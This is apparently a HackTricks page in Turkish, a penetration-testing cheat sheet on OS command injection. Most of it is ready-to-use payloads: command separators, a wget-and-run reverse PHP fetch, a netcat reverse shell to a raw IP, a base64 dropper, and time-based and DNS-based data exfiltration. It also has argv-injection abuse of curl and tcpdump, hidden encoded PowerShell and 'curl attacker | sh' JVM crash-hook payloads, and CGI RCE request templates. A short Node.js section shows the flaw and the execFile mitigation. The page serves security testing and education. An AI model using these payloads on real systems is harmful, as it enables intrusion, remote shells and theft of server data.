Command Injection

Tip

AWS Hacking’i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking’i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE) Azure Hacking’i öğrenin ve pratik yapın: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks'i Destekleyin

Command Injection Nedir?

Bir command injection, uygulamayı barındıran sunucuda bir attacker tarafından keyfi işletim sistemi komutlarının çalıştırılmasına izin verir. Sonuç olarak, uygulama ve tüm verileri tamamen ele geçirilebilir. Bu komutların çalıştırılması genellikle attacker’ın uygulamanın ortamı ve alt sistemleri üzerinde yetkisiz erişim veya kontrol elde etmesine olanak tanır.

Bağlam

Girdinizin nereye enjekte edildiğine bağlı olarak, komutlardan önce alıntılanmış bağlamı sonlandırmanız (kullanarak " veya ') gerekebilir.

Command Injection/Execution

#Both Unix and Windows supported
ls||id; ls ||id; ls|| id; ls || id # Execute both
ls|id; ls |id; ls| id; ls | id # Execute both (using a pipe)
ls&&id; ls &&id; ls&& id; ls && id #  Execute 2º if 1º finish ok
ls&id; ls &id; ls& id; ls & id # Execute both but you can only see the output of the 2º
ls %0A id # %0A Execute both (RECOMMENDED)
ls%0abash%09-c%09"id"%0a   # (Combining new lines and tabs)

#Only unix supported
`ls` # ``
$(ls) # $()
ls; id # ; Chain commands
ls${LS_COLORS:10:1}${IFS}id # Might be useful

#Not executed but may be interesting
> /var/www/html/out.txt #Try to redirect the output to a file
< /etc/passwd #Try to send some input to the command

Sınırlama Bypasses

Eğer bir linux makinesi içinde keyfi komutlar çalıştırmaya çalışıyorsanız, bu Bypasses hakkında okumak ilginizi çekecektir:

Bypass Linux Restrictions

Örnekler

vuln=127.0.0.1 %0a wget https://web.es/reverse.txt -O /tmp/reverse.php %0a php /tmp/reverse.php
vuln=127.0.0.1%0anohup nc -e /bin/bash 51.15.192.49 80
vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt | base64 -d > /tmp/pay; chmod 744 /tmp/pay; /tmp/pay

Parametreler

Kod enjeksiyonuna ve benzer RCE zafiyetlerine açık olabilecek en iyi 25 parametre şunlardır (kaynak: link):

?cmd={payload}
?exec={payload}
?command={payload}
?execute{payload}
?ping={payload}
?query={payload}
?jump={payload}
?code={payload}
?reg={payload}
?do={payload}
?func={payload}
?arg={payload}
?option={payload}
?load={payload}
?process={payload}
?step={payload}
?read={payload}
?function={payload}
?req={payload}
?feature={payload}
?exe={payload}
?module={payload}
?payload={payload}
?run={payload}
?print={payload}

Time based data exfiltration

Veri çıkarma: char by char

swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
real    0m5.007s
user    0m0.000s
sys 0m0.000s

swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
real    0m0.002s
user    0m0.000s
sys 0m0.000s

DNS tabanlı veri sızdırma

Aracı https://github.com/HoLyVieR/dnsbin adresindeki projeye dayanır; ayrıca dnsbin.zhack.ca üzerinde barındırılmaktadır

1. Go to http://dnsbin.zhack.ca/
2. Execute a simple 'ls'
for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done

$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il)

DNS based data exfiltration kontrolü için çevrimiçi araçlar:

  • dnsbin.zhack.ca
  • pingb.in

Filtering bypass

Windows

powershell C:**2\n??e*d.*? # notepad
@^p^o^w^e^r^shell c:**32\c*?c.e?e # calc

Linux

Bypass Linux Restrictions

Node.js child_process.exec ve execFile

JavaScript/TypeScript back-end’leri denetlerken sıklıkla Node.js child_process API’si ile karşılaşırsınız.

// Vulnerable: user-controlled variables interpolated inside a template string
const { exec } = require('child_process');
exec(`/usr/bin/do-something --id_user ${id_user} --payload '${JSON.stringify(payload)}'`, (err, stdout) => {
/* … */
});

exec() bir shell (/bin/sh -c) başlatır; bu yüzden shell’e özel anlamı olan herhangi bir karakter (back-ticks, ;, &&, |, $(), …) kullanıcı girdisi string’e birleştirildiğinde command injection ile sonuçlanır.

Önlem: execFile() kullanın (veya spawn()’ı shell seçeneği olmadan) ve her argümanı ayrı bir dizi elemanı olarak sağlayın, böylece shell devreye girmez:

const { execFile } = require('child_process');
execFile('/usr/bin/do-something', [
'--id_user', id_user,
'--payload', JSON.stringify(payload)
]);

Gerçek dünya vakası: Synology Photos ≤ 1.7.0-0794, kimlik doğrulaması gerektirmeyen bir WebSocket olayı aracılığıyla saldırgan kontrollü veriyi id_user içine yerleştiriyordu; bu daha sonra bir exec() çağrısına gömülerek RCE’ye yol açtı (Pwn2Own Ireland 2024).

Başında tire ile argüman/seçenek enjeksiyonu (argv, kabuk metakarakterleri yok)

Tüm enjeksiyonlar kabuk metakarakterleri gerektirmez. Uygulama güvenilmeyen dizeleri bir sistem aracına argüman olarak geçiriyorsa (hatta execve/execFile ile ve kabuk olmadan), birçok program hâlâ - veya -- ile başlayan her argümanı bir seçenek olarak çözecektir. Bu, bir saldırganın modu değiştirmesine, çıktı yollarını değiştirmesine veya tehlikeli davranışları tetiklemesine izin verir — hiç kabuğa girmeden.

Bunun sık görüldüğü yerler:

  • Gömülü web UI’ları/CGI handler’ları gibi ping <user>, tcpdump -i <iface> -w <file>, curl <url> gibi komutlar kuran bileşenler.
  • Merkezi CGI yönlendiricileri (ör. /cgi-bin/<something>.cgi ile topicurl=<handler> gibi bir seçici parametresi) — birden fazla handler aynı zayıf doğrulayıcıyı yeniden kullandığında.

Denenecekler:

  • Arka uç araç tarafından bayrak olarak tüketilecek şekilde -/-- ile başlayan değerler verin.
  • Davranışı değiştiren veya dosya yazan bayrakları kötüye kullanın, örneğin:
    • ping: -f/-c 100000 cihazı stres altına sokmak için (DoS)
    • curl: -o /tmp/x ile rastgele yollar yazmak, -K <url> ile saldırgan kontrollü config yüklemek
    • tcpdump: -G 1 -W 1 -z /path/script.sh ile güvensiz sarmalayıcılarda rotasyon sonrası yürütme elde etmek
  • Program -- end-of-options’ı destekliyorsa, --’ü yanlış yere ekleyen naif mitigasyonları atlatmayı deneyin.

Merkezi CGI dispatcherlara karşı genel PoC şablonları:

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Content-Type: application/x-www-form-urlencoded

# Flip options in a downstream tool via argv injection
topicurl=<handler>&param=-n

# Unauthenticated RCE when a handler concatenates into a shell
topicurl=setEasyMeshAgentCfg&agentName=;id;

JVM tanılama callback’ları ile garantili exec

JVM komut satırı argümanlarını enjekte etmenizi sağlayan herhangi bir yapı (_JAVA_OPTIONS, launcher config files, AdditionalJavaArguments fields in desktop agents, etc.) uygulama bytecode’una dokunmadan güvenilir bir RCE’ye dönüştürülebilir:

  1. Deterministik bir çökme zorlayın metaspace veya heap’i küçülterek: -XX:MaxMetaspaceSize=16m (veya küçük bir -Xmx). Bu, erken bootstrap sırasında bile bir OutOfMemoryError garantiler.
  2. Bir hata hook’u ekleyin: -XX:OnOutOfMemoryError="<cmd>" veya -XX:OnError="<cmd>" JVM sonlandığında rastgele bir OS komutunu çalıştırır.
  3. İsteğe bağlı olarak kurtarma girişimlerini önlemek ve payload’u tek seferlik tutmak için -XX:+CrashOnOutOfMemoryError ekleyin.

Örnek payload’lar:

-XX:MaxMetaspaceSize=16m -XX:OnOutOfMemoryError="cmd.exe /c powershell -nop -w hidden -EncodedCommand <blob>"
-XX:MaxMetaspaceSize=12m -XX:OnOutOfMemoryError="/bin/sh -c 'curl -fsS https://attacker/p.sh | sh'"

Çünkü bu diagnostikler JVM tarafından doğrudan parse edildiği için shell metacharacters gerekmez ve command, launcher ile aynı bütünlük seviyesinde çalışır. Kullanıcı tarafından sağlanan JVM flags’lerini ileten Desktop IPC bugs (bkz. Localhost WebSocket abuse) bu yüzden doğrudan OS command execution’a dönüşür.

Brute-Force Tespit Listesi

Auto_Wordlists/wordlists/command_injection.txt at main \xc2\xb7 carlospolop/Auto_Wordlists \xc2\xb7 GitHub

Referanslar

Tip

AWS Hacking’i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking’i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE) Azure Hacking’i öğrenin ve pratik yapın: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks'i Destekleyin